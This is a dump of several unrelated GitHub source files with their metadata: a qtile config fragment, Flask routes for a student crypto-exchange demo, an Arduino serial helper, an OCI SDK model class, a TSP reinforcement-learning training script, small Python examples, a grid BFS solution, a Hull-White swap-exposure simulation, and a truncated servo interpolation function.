font=\"FiraCode Nerd Font\",\n icon_size=0,\n margin=1,\n markup_normal=(\n f'{{}}'\n ),\n markup_focused=f'{{}}',\n max_title_width=128,\n parse_text=_get_app_name,\n unfocused_border=theme.DARK_GREY,\n urgent_border=theme.URGENT_COLOR,\n )\n ],\n size=theme.BAR_SIZE,\n background=theme.BG,\n )\n )\n)\n","repo_name":"jeffzi/dotfiles-fedora","sub_path":".config/qtile/qtile_config/screens.py","file_name":"screens.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7061703205","text":"import datetime\nimport random\nimport sqlite3\nimport threading\nimport time\nimport requests\nfrom flask import render_template, request, redirect, url_for, flash\nimport sha3\nfrom CryptoExchange import app, bcrypt, db\nfrom CryptoExchange.forms.AddBalanceForm import AddBalanceForm\nfrom CryptoExchange.forms.ExchangeForm import ExchangeForm\nfrom CryptoExchange.forms.PurchaseForm import PurchaseForm\nfrom CryptoExchange.forms.UserActivationForm import UserActivationForm\nfrom CryptoExchange.models.dbmodels import User, Transactions, TransactionState\nfrom CryptoExchange.forms.RegistrationForm import RegistrationForm\nfrom CryptoExchange.forms.UserAccountForm import UserAccountForm\nfrom CryptoExchange.forms.LoginForm import LoginForm\nfrom flask_login import login_required, current_user, login_user, logout_user\nfrom CryptoExchange.forms.TransactionForm import TransactionForm\n\napi_link = 'https://api.coingecko.com/api/v3/coins/markets?vs_currency=usd'\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n response = requests.get(api_link)\n data = response.json()\n return render_template('home.html', curr1_name=data[0]['name'], curr1_price=float(data[0]['current_price']),\n curr2_name=data[1]['name'], curr2_price=data[1]['current_price'],\n curr3_name=data[2]['name'], curr3_price=data[2]['current_price'],\n curr4_name=data[3]['name'], curr4_price=data[3]['current_price'],\n curr5_name=data[4]['name'], curr5_price=data[4]['current_price'])\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n if user.verified:\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n return redirect(url_for('profile_activation'))\n else:\n flash('Login Unsuccessful. Please check email and password.', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/balance')\n@login_required\ndef balance():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n account_balance = current_user.balance\n crypto_balance = get_user_crypto_balance(current_user.id)\n transfers = Transactions.query.filter(((Transactions.sender_id == current_user.id)\n | (Transactions.receiver_id == current_user.id))\n & (Transactions.sender_id != Transactions.receiver_id)).all()\n return render_template('balance.html', title='Balance',\n balance=account_balance,\n crypto_balance=crypto_balance,\n transfer=transfers)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route('/transfer', methods=['GET', 'POST'])\n@login_required\ndef transfer():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n form = TransactionForm()\n crypto_balance = get_user_crypto_balance(current_user.id)\n form.currency.choices = list(crypto_balance.keys())\n form.balance.choices = list(crypto_balance.values())\n if form.validate_on_submit():\n receiver = User.query.filter_by(email=form.receiver_email.data).first()\n gas_perc = 0.05\n hashing = sha3.keccak_256()\n hash_args = current_user.email + receiver.email + form.quantity.data + str(random.randint(1, 100))\n hashing.update(hash_args.encode('ascii'))\n\n t = Transactions(sender_id=current_user.id,\n receiver_id=receiver.id,\n transaction_hash=hashing.hexdigest(),\n crypto=form.currency.data,\n quantity=form.quantity.data,\n gas_percentage=gas_perc,\n gas=float(form.quantity.data) * gas_perc)\n for name, quantity in crypto_balance.items():\n if name == form.currency.data:\n if (float(t.quantity) + float(t.gas)) > float(quantity):\n flash(\"Not enough balance to make transfer.\", 'error')\n t.state = TransactionState.DENIED\n db.session.add(t)\n db.session.commit()\n else:\n flash(\"Transfer started successfully.\", 'success')\n t.state = TransactionState.IN_PROCESS\n db.session.add(t)\n db.session.commit()\n validation_thread = threading.Thread(target=transaction_validation, args=[t.id])\n validation_thread.start()\n break\n return redirect(url_for('balance'))\n return render_template('transaction.html', title='Transaction Crypto', form=form)\n\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n if current_user.is_authenticated:\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n return redirect(url_for('home'))\n form = RegistrationForm()\n form.country.choices = get_countries()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(\n first_name=form.first_name.data, last_name=form.last_name.data, email=form.email.data,\n address=form.address.data, city=form.city.data, country=form.country.data,\n phone=form.phone.data, password=hashed_password, verified=False\n )\n db.session.add(user)\n db.session.commit()\n flash(f'Your account has been created! You are now able to log in.', 'success')\n return redirect(url_for('login'))\n\n return render_template('register.html', title='Registration', form=form)\n\n\n@app.route('/profile', methods=['GET', 'POST'])\n@login_required\ndef profile():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n form = UserAccountForm()\n form.country.choices = get_countries()\n if form.validate_on_submit():\n current_user.first_name = form.first_name.data\n current_user.last_name = form.last_name.data\n current_user.email = form.email.data\n current_user.address = form.address.data\n current_user.city = form.city.data\n current_user.country = form.country.data\n current_user.phone = form.phone.data\n db.session.commit()\n flash('Your account has been updated!', 'success')\n return redirect(url_for('profile'))\n elif request.method == 'GET':\n form.first_name.data = current_user.first_name\n form.last_name.data = current_user.last_name\n form.email.data = current_user.email\n form.address.data = current_user.address\n form.city.data = current_user.city\n form.country.data = current_user.country\n form.phone.data = current_user.phone\n return render_template('profile.html', title='Profile', form=form)\n\n\n@app.route('/profile_activation', methods=['GET', 'POST'])\n@login_required\ndef profile_activation():\n if current_user.verified:\n return redirect(url_for('home'))\n form = UserActivationForm()\n curr_year = datetime.datetime.now().year\n years = []\n for x in range(curr_year, curr_year + 5):\n years.append(x)\n months = []\n for x in range(1, 13):\n months.append(str(x).zfill(2))\n form.card_year.choices = years\n form.card_month.choices = months\n if form.validate_on_submit():\n current_user.verified = True\n current_user.balance = 1\n db.session.commit()\n flash('Your account has been activated!', 'success')\n return redirect(url_for('profile'))\n return render_template('profile_activation.html', title='Profile Activation', form=form)\n\n\n@app.route('/purchase', methods=['GET', 'POST'])\n@login_required\ndef purchase():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n form = PurchaseForm()\n crypto = get_crypto()\n names = []\n prices = []\n for item in crypto:\n names.append(item)\n prices.append(crypto[item])\n form.currencies.choices = names\n form.prices.choices = prices\n form.balance.data = current_user.balance\n if form.validate_on_submit():\n transaction = Transactions(sender_id=current_user.id,\n receiver_id=current_user.id,\n crypto=form.currencies.data,\n quantity=form.quantity.data,\n gas_percentage=0,\n gas=0,\n state=TransactionState.SUCCESS)\n current_user.balance = current_user.balance - (float(form.prices.data) * float(form.quantity.data))\n db.session.add(transaction)\n db.session.commit()\n flash('Crypto coins successfully bought.', 'success')\n return redirect(url_for('balance'))\n return render_template('purchase.html', title='Purchase Crypto', form=form)\n\n\n@app.route('/add_balance', methods=['GET', 'POST'])\n@login_required\ndef add_balance():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n form = AddBalanceForm()\n form.current_balance.data = current_user.balance\n if form.validate_on_submit():\n current_user.balance = current_user.balance + float(form.balance_to_add.data)\n current_user.balance = round(current_user.balance, 2)\n db.session.commit()\n flash('Balance successfully added!', 'success')\n return redirect(url_for('purchase'))\n return render_template('add_balance.html', title='Add Balance', form=form)\n\n\n@app.route('/exchange', methods=['GET', 'POST'])\n@login_required\ndef exchange():\n if not current_user.verified:\n return redirect(url_for('profile_activation'))\n form = ExchangeForm()\n crypto_balance = get_user_crypto_balance(current_user.id)\n form.from_crypto.choices = list(crypto_balance.keys())\n form.from_balance.choices = list(crypto_balance.values())\n cryptos = get_crypto()\n crypto_price = []\n for item in crypto_balance:\n crypto_price.append(cryptos[item])\n form.from_price.choices = crypto_price\n form.to_crypto.choices = list(cryptos.keys())\n form.to_price.choices = list(cryptos.values())\n if form.validate_on_submit():\n t_add = Transactions(sender_id=current_user.id,\n receiver_id=current_user.id,\n crypto=form.to_crypto.data,\n quantity=form.to_quantity.data,\n gas_percentage=0.0,\n gas=0.0,\n state=TransactionState.SUCCESS)\n t_remove = Transactions(sender_id=current_user.id,\n receiver_id=current_user.id,\n crypto=form.from_crypto.data,\n quantity=0-float(form.from_quantity.data),\n gas_percentage=0.0,\n gas=0.0,\n state=TransactionState.SUCCESS)\n db.session.add(t_remove)\n db.session.commit()\n db.session.add(t_add)\n db.session.commit()\n flash('Crypto successfully exchanged!', 'success')\n return redirect(url_for('exchange'))\n return render_template('exchange.html', title='Exchange Crypto Currencies', form=form)\n\n\n# validation thread\ndef transaction_validation(transaction_id):\n db_name = 'CryptoExchange/novabaza.db'\n transactions_table = 'transactions'\n validation_time = 5 * 60\n time.sleep(validation_time)\n try:\n with sqlite3.connect(db_name) as connection:\n cursor = connection.cursor()\n sql = f\"UPDATE {transactions_table} SET state='SUCCESS' WHERE id={transaction_id};\"\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(e)\n\n\n# helpers\ndef get_user_crypto_balance(user_id):\n crypto = Transactions.query.filter(((Transactions.sender_id == current_user.id) |\n (Transactions.receiver_id == current_user.id)) &\n (Transactions.state != 'DENIED')).all()\n crypto_balance = {}\n for item in crypto:\n if item.crypto in crypto_balance:\n # bought\n if item.sender_id == item.receiver_id:\n crypto_balance[item.crypto] = crypto_balance[item.crypto] + item.quantity\n # received\n if item.sender_id != current_user.id and item.state == TransactionState.SUCCESS:\n crypto_balance[item.crypto] = crypto_balance[item.crypto] + item.quantity\n # sent\n if item.receiver_id != current_user.id:\n crypto_balance[item.crypto] = crypto_balance[item.crypto] - (item.quantity + item.gas)\n else:\n if item.sender_id == item.receiver_id:\n crypto_balance[item.crypto] = item.quantity\n if item.sender_id != current_user.id and item.state == TransactionState.SUCCESS:\n crypto_balance[item.crypto] = item.quantity\n if item.receiver_id != current_user.id:\n crypto_balance[item.crypto] = 0 - (float(item.quantity) + float(item.gas))\n return crypto_balance\n\n\ndef get_countries():\n url = 'https://restcountries.com/v2/all?fields=name,altSpellings'\n response = requests.get(url)\n d = []\n for country in response.json():\n if country['name'] == 'Antarctica':\n country['altSpellings'].append('AQ')\n\n d.append((country['altSpellings'][0], country['name']))\n return d\n\n\ndef get_currencies():\n retval = []\n response = requests.get(api_link)\n data = response.json()\n for item in data:\n retval.append(item['name'])\n return retval\n\n\ndef get_crypto():\n retval = {}\n response = requests.get(api_link)\n data = response.json()\n for item in data:\n retval.update({(item['name']): (item['current_price'])})\n return retval\n","repo_name":"PR22-2017/DRS-CryptoExchange-TIM1","sub_path":"CryptoExchange/controllers/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4427714388","text":"import warnings\nfrom serial.serialwin32 import Serial\nfrom serial.tools import list_ports\n\n\nclass Arduino:\n def __init__(self):\n self.arduino_ports = [\n p.device\n for p in list_ports.comports()\n if 'Arduino' in p.description\n ]\n if not self.arduino_ports:\n raise IOError(\"No Arduino found\")\n if len(self.arduino_ports) > 1:\n warnings.warn('Multiple Arduino\\'s found - using the first')\n print(self.arduino_ports[0])\n\n @property\n def serial_a(self):\n return Serial(\"3\", 9600)\n\n\na_serial = Arduino()\nserial_a = a_serial.serial_a\nserial_a.open()\nserial_a.write('aaa')\n","repo_name":"Okina1Raion/course","sub_path":"IoT_CP/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31598661859","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass HcxLicenseSummary(object):\n \"\"\"\n HCX on-premise license information summary.\n \"\"\"\n\n #: A constant which can be used with the status property of a HcxLicenseSummary.\n #: This constant has a value of \"AVAILABLE\"\n STATUS_AVAILABLE = \"AVAILABLE\"\n\n #: A constant which can be used with the status property of a HcxLicenseSummary.\n #: This constant has a value of \"CONSUMED\"\n STATUS_CONSUMED = \"CONSUMED\"\n\n #: A constant which can be used with the status property of a HcxLicenseSummary.\n #: This constant has a value of \"DEACTIVATED\"\n STATUS_DEACTIVATED = \"DEACTIVATED\"\n\n #: A constant which can be used with the status property of a HcxLicenseSummary.\n #: This constant has a value of \"DELETED\"\n STATUS_DELETED = \"DELETED\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new HcxLicenseSummary object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param activation_key:\n The value to assign to the activation_key property of this HcxLicenseSummary.\n :type activation_key: str\n\n :param status:\n The value to assign to the status property of this HcxLicenseSummary.\n Allowed values for this property are: \"AVAILABLE\", \"CONSUMED\", \"DEACTIVATED\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type status: str\n\n :param system_name:\n The value to assign to the system_name property of this HcxLicenseSummary.\n :type system_name: str\n\n \"\"\"\n self.swagger_types = {\n 'activation_key': 'str',\n 'status': 'str',\n 'system_name': 'str'\n }\n\n self.attribute_map = {\n 'activation_key': 'activationKey',\n 'status': 'status',\n 'system_name': 'systemName'\n }\n\n self._activation_key = None\n self._status = None\n self._system_name = None\n\n @property\n def activation_key(self):\n \"\"\"\n **[Required]** Gets the activation_key of this HcxLicenseSummary.\n HCX on-premise license key value.\n\n\n :return: The activation_key of this HcxLicenseSummary.\n :rtype: str\n \"\"\"\n return self._activation_key\n\n @activation_key.setter\n def activation_key(self, activation_key):\n \"\"\"\n Sets the activation_key of this HcxLicenseSummary.\n HCX on-premise license key value.\n\n\n :param activation_key: The activation_key of this HcxLicenseSummary.\n :type: str\n \"\"\"\n self._activation_key = activation_key\n\n @property\n def status(self):\n \"\"\"\n **[Required]** Gets the status of this HcxLicenseSummary.\n status of HCX on-premise license.\n\n Allowed values for this property are: \"AVAILABLE\", \"CONSUMED\", \"DEACTIVATED\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The status of this HcxLicenseSummary.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets the status of this HcxLicenseSummary.\n status of HCX on-premise license.\n\n\n :param status: The status of this HcxLicenseSummary.\n :type: str\n \"\"\"\n allowed_values = [\"AVAILABLE\", \"CONSUMED\", \"DEACTIVATED\", \"DELETED\"]\n if not value_allowed_none_or_none_sentinel(status, allowed_values):\n status = 'UNKNOWN_ENUM_VALUE'\n self._status = status\n\n @property\n def system_name(self):\n \"\"\"\n Gets the system_name of this HcxLicenseSummary.\n Name of the system that consumed the HCX on-premise license\n\n\n :return: The system_name of this HcxLicenseSummary.\n :rtype: str\n \"\"\"\n return self._system_name\n\n @system_name.setter\n def system_name(self, system_name):\n \"\"\"\n Sets the system_name of this HcxLicenseSummary.\n Name of the system that consumed the HCX on-premise license\n\n\n :param system_name: The system_name of this HcxLicenseSummary.\n :type: str\n \"\"\"\n self._system_name = system_name\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/ocvp/models/hcx_license_summary.py","file_name":"hcx_license_summary.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"2465972710","text":"import os\nimport json\nimport pprint\nfrom options import get_options\n\nimport torch\nimport torch.optim as optim\nfrom tensorboard_logger import Logger as TbLogger\n\nfrom nets.critic_network import CriticNetwork\nfrom train import train_epoch, validate\nfrom nets.reinforce_baselines import CriticBaseline\nfrom nets.attention_model import AttentionModel\nfrom utils import torch_load_cpu, load_problem, get_inner_model\n\n\ndef run(opts):\n\n # Pretty print the run args\n pprint.pprint(vars(opts))\n\n # Set the random seed\n torch.manual_seed(opts.seed)\n\n # Optionally configure tensorboard\n tb_logger = None\n if not opts.no_tensorboard:\n tb_logger = TbLogger(os.path.join(opts.log_dir, \"{}_{}\".format(opts.problem, opts.graph_size), opts.run_name))\n\n if not os.path.exists(opts.save_dir):\n os.makedirs(opts.save_dir)\n \n # Save arguments so exact configuration can always be found\n with open(os.path.join(opts.save_dir, \"args.json\"), 'w') as f:\n json.dump(vars(opts), f, indent=True)\n\n # Set the device\n opts.device = torch.device(\"cuda\" if opts.use_cuda else \"cpu\")\n \n # Figure out what's the problem\n problem = load_problem(opts.problem)(\n p_size = opts.graph_size, \n with_assert = not opts.no_assert)\n\n # Load data from load_path\n load_data = {}\n assert opts.load_path is None or opts.resume is None, \"Only one of load path and resume can be given\"\n load_path = opts.load_path if opts.load_path is not None else opts.resume\n if load_path is not None:\n print(' [*] Loading data from {}'.format(load_path))\n load_data = torch_load_cpu(load_path)\n\n # Initialize model\n model_class = {\n 'attention': AttentionModel,\n }.get(opts.model, None)\n assert model_class is not None, \"Unknown model: {}\".format(model_class)\n model = model_class(\n problem = problem,\n embedding_dim = opts.embedding_dim,\n hidden_dim = opts.hidden_dim,\n n_heads = opts.n_heads_encoder,\n n_layers = opts.n_encode_layers,\n normalization = opts.normalization,\n device = opts.device\n ).to(opts.device)\n\n if opts.use_cuda and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n \n\n # Overwrite model parameters by parameters to load\n model_ = get_inner_model(model)\n model_.load_state_dict({**model_.state_dict(), **load_data.get('model', {})})\n \n # Load the validation datasets\n val_dataset = problem.make_dataset(size=opts.graph_size,\n num_samples=opts.val_size,\n filename = opts.val_dataset)\n \n # Do validation only\n if opts.eval_only:\n validate(problem, model, val_dataset, tb_logger, opts, _id = 0)\n \n else:\n \n # Initialize baseline\n baseline = CriticBaseline(\n CriticNetwork(\n problem = problem,\n embedding_dim = opts.embedding_dim,\n hidden_dim = opts.hidden_dim,\n n_heads = opts.n_heads_decoder,\n n_layers = opts.n_encode_layers,\n normalization = opts.normalization,\n device = opts.device\n ).to(opts.device)\n )\n \n # Load baseline from data, make sure script is called with same type of baseline\n if 'baseline' in load_data:\n baseline.load_state_dict(load_data['baseline'])\n \n # Initialize optimizer\n optimizer = optim.Adam(\n [{'params': model.parameters(), 'lr': opts.lr_model}]\n + (\n [{'params': baseline.get_learnable_parameters(), 'lr': opts.lr_critic}]\n if len(baseline.get_learnable_parameters()) > 0 else []\n )\n )\n \n # Load optimizer state\n if 'optimizer' in load_data:\n optimizer.load_state_dict(load_data['optimizer'])\n for state in optimizer.state.values():\n for k, v in state.items():\n # if isinstance(v, torch.Tensor):\n if torch.is_tensor(v):\n state[k] = v.to(opts.device)\n \n # Initialize learning rate scheduler, decay by lr_decay once per epoch!\n lr_scheduler = optim.lr_scheduler.LambdaLR(optimizer, lambda epoch: opts.lr_decay ** epoch)\n \n if opts.resume:\n epoch_resume = int(os.path.splitext(os.path.split(opts.resume)[-1])[0].split(\"-\")[1])\n \n torch.set_rng_state(load_data['rng_state'])\n if opts.use_cuda:\n torch.cuda.set_rng_state_all(load_data['cuda_rng_state'])\n # Set the random states\n # Dumping of state was done before epoch callback, so do that now (model is loaded)\n print(\"Resuming after {}\".format(epoch_resume))\n opts.epoch_start = epoch_resume + 1\n \n # Start the actual training loop\n for epoch in range(opts.epoch_start, opts.epoch_start + opts.n_epochs):\n train_epoch(\n problem,\n model,\n optimizer,\n baseline,\n lr_scheduler,\n epoch,\n val_dataset,\n tb_logger,\n opts\n )\n\n\nif __name__ == \"__main__\":\n import warnings\n warnings.filterwarnings(\"ignore\", category=Warning)\n os.environ['KMP_DUPLICATE_LIB_OK']='True'\n \n run(get_options())","repo_name":"yining043/TSP-improve","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"52"} +{"seq_id":"17939646254","text":"# Filter\nitems = [1, 2, 3, 4, 5]\na_filter = [item for item in items if item >= 2]\nprint(a_filter)\n\nitems = {'a': 1, 'b': 2, 'c': 3}\na_filter = [item for item in items.items() if item[1] >= 2]\nprint(dict(a_filter))\n\nitem = (1, 2, 3, 4, 5)\na_filter = [item for item in item if item >= 2]\nprint(tuple(a_filter))\n\n# Sort\nitems = [1, 2, 3, 4, 5]\na_sort = sorted(items, key=lambda item: item, reverse=True)\nprint(a_sort)\n\nitems = {'a': 1, 'b': 2, 'c': 3}\na_sort = dict(sorted(items.items(), key=lambda item: item[1], reverse=True))\nprint(a_sort)\n\nitems = (1, 2, 3, 4, 5)\na_sort = tuple(sorted(items, key=lambda item: item, reverse=True))\nprint(a_sort)\n\n\nclass bank:\n def __init__(self):\n self.bal = 50000\n\n def deb(self):\n print(self.bal - 15000)\n\n\nba = bank()\nba.deb()\n","repo_name":"Ronnapon/python-example","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212884005","text":"import sys\r\nfrom collections import deque\r\n\r\nclass Apartment:\r\n def __init__(self) -> None:\r\n self.N: int\r\n self.land: list[list[int]] = []\r\n self.house: set[tuple[int, int]] = set()\r\n self.get_info()\r\n \r\n\r\n def get_info(self) -> None:\r\n self.N = int(input())\r\n for i in range(self.N):\r\n row = map(int, list(input().strip()))\r\n self.land.append([])\r\n for j, x in enumerate(row):\r\n if x == 1:\r\n self.house.add((i, j))\r\n self.land[i].append(x)\r\n \r\n def grouping(self) -> list[int]:\r\n Dx = [0, 0, -1, 1]\r\n Dy = [-1, 1, 0, 0]\r\n group: list[int] = []\r\n while self.house:\r\n src = self.house.pop()\r\n self.house.add(src)\r\n Q = deque([src])\r\n checked: set[tuple[int, int]] = set()\r\n while Q:\r\n i, j = Q.popleft()\r\n if (i, j) in checked:\r\n continue\r\n self.house.discard((i, j))\r\n checked.add((i, j))\r\n for dx, dy in zip(Dx, Dy):\r\n x, y = i + dx, j + dy\r\n if 0 <= x < self.N and 0 <= y < self.N and self.land[x][y] == 1:\r\n Q.append((x, y))\r\n group.append(len(checked))\r\n return group\r\n\r\ndef main():\r\n apart = Apartment()\r\n G = apart.grouping()\r\n print(len(G))\r\n G.sort()\r\n print(*G, sep='\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/2667. 단지번호붙이기/단지번호붙이기.py","file_name":"단지번호붙이기.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28841250551","text":"import numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport scipy.integrate as integrate\r\n\r\n\r\n# Parameters\r\ndt = 0.001\r\nN = 100\r\nmaturity=2\r\nvol=0.1\r\nr0 = 0\r\na=0.1\r\nnotional=100\r\nt_begin = 0\r\nt_end = 1\r\n\r\n# These are test values for P(0,t)\r\np_grid = np.linspace(1, 0.6, num=2+int(maturity/dt))\r\n\r\n# These are possible values of T0, T1, ... ,Tm\r\nmaturity_grid = [0.25, 0.5, 0.75, 1, 1.25, 1.5, 1.75, 2]\r\n\r\n# For computational purpose\r\ntimeGrid = np.linspace(0, maturity_grid[0], num = 1+int(maturity_grid[0]/dt))\r\n\r\n# Functions\r\n###############################################################################\r\n\r\n# Theta(t) in the Hull-White model\r\ndef theta(t):\r\n return -0.5*abs(math.sin(t))\r\n\r\n# As in the notes\r\ndef B(s,t):\r\n return (1/a)*(1-math.e**(-1*a*(s-t)))\r\n\r\ndef A(s,t, p_s, p_t, fM):\r\n return (p_t/p_s)*math.e**(B(s,t)*fM - ((vol**2)/(4*a))*((B(s,t))**2)*(1-math.e**(-2*a*s)))\r\n\r\n# Function to simulate N paths of Hull-White and take an average\r\ndef hull_white(N, vol, maturity, a, dt):\r\n M = int(maturity/dt)\r\n r_grid = np.zeros((N, M+1))\r\n avg_grid = []\r\n norm = np.zeros((N, M))\r\n for j in range(N):\r\n norm[j, :] = np.random.normal(0, 1, size = M)\r\n for i in range(1,M+1):\r\n r_grid[:,i] = r_grid[:,i-1] + (theta(i*dt) - a*r_grid[:,i-1])*dt + vol*math.sqrt(dt)*norm[:,i-1]\r\n for i in range(M+1):\r\n avg_grid.append(np.mean(r_grid[:,i]))\r\n return r_grid, avg_grid\r\n\r\n\r\n# Retrieve the value of P(s,t) based on r(s) from Hull-White\r\ndef P(s,t, short_rate, p_s, p_t, fM):\r\n return A(s,t, p_s, p_t, fM)*math.e**(-1*B(s,t)*(short_rate[int(s/dt)]))\r\n\r\n# Determine the forward rate f(0,s) = - d/dt log(p(0,s))\r\n# via a numerical scheme of the derivative\r\ndef f(s, p_grid):\r\n return -1*(math.log(p_grid[1+int(s/dt)]) - math.log(p_grid[int(s/dt)]))/dt\r\n\r\n# Function to determine the value of a swap at time t, where we make a \r\n# distintion between t <= T0 and t > T0\r\ndef V(t, maturity_grid, notional):\r\n short_rate = hull_white(N, vol, maturity_grid[-1], a, dt)[1]\r\n fixed_grid = []\r\n delta = maturity_grid[-1] - maturity_grid[-2]\r\n # If t <= T0 we simply use the formula given in the notes\r\n if (t <= maturity_grid[0]):\r\n p_t_T_grid = []\r\n for T in maturity_grid:\r\n p_t_T_grid.append(P(t, T, short_rate, p_grid[int(t/dt)], p_grid[int(T/dt)], f(t, p_grid)))\r\n fixed_grid.append(P(0, T, short_rate, p_grid[int(0/dt)], p_grid[int(T/dt)], f(0, p_grid)))\r\n fixed = (fixed_grid[0] - fixed_grid[-1])/(delta*(sum(fixed_grid) - fixed_grid[0]))\r\n temp = fixed*delta*(sum(p_t_T_grid) - p_t_T_grid[0])\r\n return notional*(p_t_T_grid[0] - p_t_T_grid[-1] - temp), fixed, short_rate\r\n # Otherwise (t > T0) we make a small change to the formula\r\n else:\r\n for T in maturity_grid:\r\n fixed_grid.append(P(0, T, short_rate, p_grid[int(0/dt)], p_grid[int(T/dt)], f(0, p_grid)))\r\n fixed = (fixed_grid[0] - fixed_grid[-1])/(delta*(sum(fixed_grid) - fixed_grid[0]))\r\n return 0, fixed, short_rate\r\n \r\n# Function to compute net present value\r\ndef NPV(t, maturity_grid, notional):\r\n v, K, short_rate = V(t, maturity_grid, notional) #Fixed rate\r\n PV_fixed = 0\r\n p_t_T_grid = []\r\n forward_grid = []\r\n delta = maturity_grid[1] - maturity_grid[0]\r\n for T in [T for T in maturity_grid if t <= T]:\r\n p_t_T_grid.append(P(t, T, short_rate, p_grid[int(t/dt)], p_grid[int(T/dt)], f(t, p_grid)))\r\n forward_grid.append((1/delta)*p_t_T_grid[0]*(1/p_t_T_grid[0] - 1))\r\n for i in range(1,len(p_t_T_grid)): \r\n forward_grid.append((1/delta)*p_t_T_grid[i-1]*(p_t_T_grid[i-1]/p_t_T_grid[i] - 1))\r\n PV_fixed = delta*K*sum(p_t_T_grid)\r\n PV_float = delta*sum(forward_grid)\r\n return PV_float - PV_fixed\r\n\r\n# We compute the EPE based on NPV\r\ndef EPE(t, maturity_grid, notional):\r\n return max(NPV(t, maturity_grid, notional), 0)\r\n \r\n \r\n \r\n \r\n\r\n###############################################################################\r\n\r\n#HW, avg_HW = hull_white(N, vol, maturity, 0.1, dt)\r\n\r\nt_grid = np.linspace(t_begin, t_end, num = int(1+(t_end - t_begin)/dt))\r\n\r\nEPE_grid = []\r\nfor T in t_grid:\r\n EPE_grid.append(NPV(T, maturity_grid, notional))\r\n \r\nplt.plot(t_grid, EPE_grid, label='EPE of swap at time t', color='b')\r\n \r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n ","repo_name":"brucema94/AdvancedCompfi","sub_path":"HullWhite2.py","file_name":"HullWhite2.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74450261604","text":"\n\n\n\ndef translate(start,end):\n max_steps = 0\n for servo in range(0,6):\n steps=abs(start[servo] - end[servo])\n # Determine size of location matrix array\n # and note which servo has the most steps to make\n if steps > max_steps:\n max_steps = steps\n hi_servo = servo\n\n # Create the locmat array with steps for servo that\n # moves the most\n locmat =[]\n start_hi = start[hi_servo]\n for step in range(0,max_steps):\n locmat.append([0,0,0,0,0,0])\n\n if start[hi_servo] < end[hi_servo]:\n start_hi = start_hi + 1\n else:\n start_hi = start_hi - 1\n\n locmat[step][hi_servo] = start_hi\n\n # Populate the matrix with the other servos positoins\n # required so that all servos arrive at final location \n # when the servo with the most steps does.\n for servo in range(0,6):\n if servo != hi_servo:\n for step in range(0,max_steps):\n if start[servo] > end[servo]:\n\n locmat[step][servo] = start[servo] - abs(start[servo] - end[servo]) * step / max_steps \n else:\n locmat[step][servo] = start[servo] + abs(start[servo] - end[servo]) * step / max_steps\n locmat[step][servo] = round(locmat[step][servo])\n\n\n \n return locmat\n \n\nif __name__ == '__main__':\n\n location = [[1,2,3,4,95,6],\n [10,1,50,90,5,25],\n 